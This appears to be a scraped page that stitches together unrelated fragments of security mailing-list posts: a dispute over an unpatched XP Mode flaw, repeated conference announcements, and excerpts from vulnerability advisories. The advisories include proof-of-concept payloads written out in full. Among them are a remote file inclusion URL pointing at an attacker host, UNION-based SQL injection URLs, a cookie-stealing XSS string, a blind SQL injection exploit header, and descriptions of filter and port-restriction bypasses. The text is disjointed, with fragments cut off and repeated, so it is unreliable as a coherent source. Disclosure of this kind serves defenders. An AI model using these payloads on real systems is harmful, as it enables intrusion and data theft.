<< Previous Next >>
getting
bulletin)
Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
>
> 1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
>
> 2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
>
> t
>
Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
t
> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hello Bug Traq Readers, here are some updates on upcoming Black Hat
briefings as well as ways to get involved.
BLACK HAT FREE WEBINAR Nov 20th
https://www.blackhat.com/html/webinars/clickjacking.html
Black Hat Webcast #5 is scheduled for Thursday, November 20 at 1pm PST.
Still wrong, No DoS. The server responds to further requests, after the dialog box appears:
192.168.1.5
hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866
"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:
1.- HTTP Requests are terminated by the CRLF characters.
2.- Forcing to talk via HTTP/1.0 version so that dont send the host header.
3.- Finally, by Fragmenting the GET or POST requests
Analysis:
Fortinet's past vulnerability
(http://www.fortiguardcenter.com/advisory/FGA-2006-10.html) said:
When that pattern is located in the driver code, the entry of the
function 'memcpy' is patched in the import table, redirecting this
function call to the hook function 'handle', previously written by the
PoC code in kernel memory. Then, when 'memcpy' is called by the driver
to assemble the package to be sent to the hypervisor, the execution flow
will jump to the 'handle2' function (via the hook set by the 'handle'),
which is the function that receives the content of the argument passed
to 'memcpy' and turns a 'Simple' type packet into a 'GpaDirect' type
packet. All these steps are taken in order to trigger the vulnerability.
The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial and symmetrical algorithm in Javascript code with no
secret. Given that user passwords are locally stored in user cookies and
having the Javascript code to encrypt and decrypt passwords in a .js
file , the authentication process of ServiceDesk Plus can be bypassed
allowing an attacker to get usernames+passwords of registered users.
Additionally, a cross site scripting vulnerability related to search
functions was found.
1) Introduction
===============
From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933
1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
It's XP. Running in RDP mode. It's got IE6, and wants antivirus. Of
course it's vulnerable to any and all gobs of stuff out there. But it's
goal and intent is to allow Small shops to deploy Win7. If you need
more security, get appv/medv/whateverv or other virtualization.
It's not a security platform. It's a get the stupid 16 bit line of
business app working platform.
Thor (Hammer of God) wrote:
> P.S.
#!/usr/bin/perl
#--------------------------------------------------------------------------------
#(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.familycms.com/index.php
#-->DOWNLOAD: http://www.familycms.com/download.php
#-->DEMO: http://www.familycms.com/demo/index.php
Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos
Vuln GET var --> 'cat_id'
Note: Here was not possible a XSS attack
-------------------
PROOFS OF CONCEPT:
-------------------
[++] GET var --> 'quiz'
[++] File vuln --> 'num_questions.php'
~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*
Details
*******
1. Local File Include vulnerabilities found in script data/inc/themes/predefined_variables.php
Vulnerable GET parameters "blogpost", "cat" and "file".
First discovered by AmnPardaz Security Research Team [http://www.bugreport.ir/index_48.htm].
Vendor fixed vulnerability in version 4.5.2 by blocking directly access to this file [http://www.pluck-cms.org/releasenotes.php#4.5.2].
However, attacker still can exploit this vulnerability from index.php file.
We are proud to announce the 16th annual Def Con.
If you are at all familiar with any of the previous Cons, then you
will have a good idea of what DEF CON will be like. If you don't have any
experience with Cons, they are an event on the order of a pilgrimage to
Mecca for the underground. They are a mind-blowing orgy of information
exchange, viewpoints, speeches, education, enlightenment... And most of all
sheer, unchecked PARTYING. It is an event that you must experience at least
once in your lifetime.
We are proud to announce the 16th annual Def Con.
If you are at all familiar with any of the previous Cons, then you
will have a good idea of what DEF CON will be like. If you don't have any
experience with Cons, they are an event on the order of a pilgrimage to
Mecca for the underground. They are a mind-blowing orgy of information
exchange, viewpoints, speeches, education, enlightenment... And most of all
sheer, unchecked PARTYING. It is an event that you must experience at least
once in your lifetime.
We are proud to announce the 16th annual Def Con.
If you are at all familiar with any of the previous Cons, then you will have
a good idea of what DEF CON will be like. If you don't have any experience
with Cons, they are an event on the order of a pilgrimage to Mecca for the
underground. They are a mind-blowing orgy of information exchange,
viewpoints, speeches, education, enlightenment... And most of all sheer,
unchecked PARTYING. It is an event that you must experience at least once in
your lifetime.
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.
1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
TOORCAMP 2012
ToorCamp is a five-day open-air event for hackers, makers, breakers, and shakers. ToorCamp is where you get together with the rest of the best in a relaxing, beautiful atmosphere, and exchange ideas with the brightest technology experts from around the world. The camp has everything you need: power, internet, food and fun. Bring your tent, bring a friend – and get ready to reunite and reignite with really smart people, just like you.
GIVE A TALK
Want to share? We encourage you to submit a Talk or a Workshop idea to us. We are accepting 50-minute, 20-minute, and lightning talks as well as workshops of any length. For those that just want to work on a project with others, we are also providing resources for participants to organize hacking sessions. Talks can range from hacking and breaking new technologies to orienteering, philosophy, cooking, politics, etc. We will consider any talk that you think would be interesting for an intelligent audience of geeks like you.
- Vulnerability:
####################
+--> Local File Inclusion (LFI)
The AneCMS try to locate local files for responding users according
to GET parameters. There are 25 infected
files, but approximately whole of them are protected else of the
'index.php' and 'rss.php' files. Check the
exploits section for the details.
+--> Remote Code Execution
unearthed.
Apple is going to learn several lessons here, the most important of which is
probably not to let an unsigned short pose as anything other than an unsigned
short. Open up a Safari browser on your favorite chode-sniffing operating
system. Go to a "banned" port like 25 and you'll get an error:
___Not allowed to use restricted network port___ (WebKitErrorDomain:103)
Add 65536 to 25 to make 65561 and revisit the site on this new port-- no such
cockblocking. You're good to go. You can now use the Safari web browser as a
> I could only imagine. The other problem is that many people seem to think I'm saying something against
> the Chinese *people* themselves, based on the "f* you round-eye* messages I've received (and they call
> ME racist). They don't seem to get the clear distinction (to me) between the Chinese people and China's
> network. It's the machines I'm concerned with the attacks coming from those machine. Just because the
> machine is sourced in China doesn't mean the attacker is - so I have to do the best I can to defend against
> the machines. However, that unfortunately comes across to those who choose not to think it through as me
> saying something against the Chinese themselves.
> Then again, as you well know, people will take any opportunity they can just to be ugly and confrontational,
> and to have something to rail about. In the face of the reality of China's horribly infected network, when I
post [1]:
(btw, that is the same question we are talking in twitter)
- Based on the blog post "Results of Investigation into Holyday ISS Claim"
(MSRC) [2], there is no vulnerability related to this case, right? BUT... If a
user has a weak password, a guessable password, you can GUESS the user's
password and get the user's access... Getting all the privileges he/she has.
Okay, I know that there are a lot of best practices floating around, describing
many, many ways to enforce the users to create a strong password instead... But
according to my experience in pen-tests, the easiest way to get a system access
is guessing users' passwords. RIGHT?
-------------------
PROOFS OF CONCEPT:
-------------------
[++] GET var --> 'id'
[++] File vuln --> 'pag1.php'
~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/*
> | > > effects but perhaps they can be made statistically very unlikely,
> | > > without blowing out the size of a browser.
> | > Why do you say a couple of megabytes? 99% of the value would be
> | > 1024-bit RSA keys. There are ~32,000 such keys. If you devote an
> | > 80-bit hash to each one (which is easily large enough to give you a
> | > vanishingly small false positive probability; you could probably get
> | > away with 64 bits), that's 320KB. Given that the smallest Firefox
> | > [...]
> You can get by with a lot less than 64 bits. People see problems like
> this and immediately think "birthday paradox", but there is no "birthday
> paradox" here: You aren't look for pairs in an ever-growing set,
There are a number of SQL Injection issues in PHP Live Helper
that allow for an attacker to have arbitrary access to database
contents such as administrator credentials. First, let's have a
look at global.php @ lines 51-60
function get ($table, $id, $from="id") {
$result=$this->DB_site->query_first("SELECT * FROM ".
$this->dbprefix.$table." where ".$from."='$id'");
if (is_array($result)) {
foreach ($result as $key => $val) {
$info[$key] = stripslashes($val);
Announcing CanSecWest PWN2OWN 2008.
===================================
Three targets, all patched. All in typical client configurations with
typical user configurations. You hack it, you get to keep it.
Each has a file on them and it contains the instructions and how to
claim the prize.
Announcing CanSecWest PWN2OWN 2008.
===================================
Three targets, all patched. All in typical client configurations with
typical user configurations. You hack it, you get to keep it.
Each has a file on them and it contains the instructions and how to
claim the prize.
-----------------------------------------
A] partial directory traversal on Windows
-----------------------------------------
Using 3 dots in the HTTP query is possible to get a specific file in
the parent directory of the Firefly admin-root folder.
That means that an attacker can download the mt-daapd.conf file which
contains all the configuration of the server or other files like
firefly.log and so on.
<<Previous Next>>
|
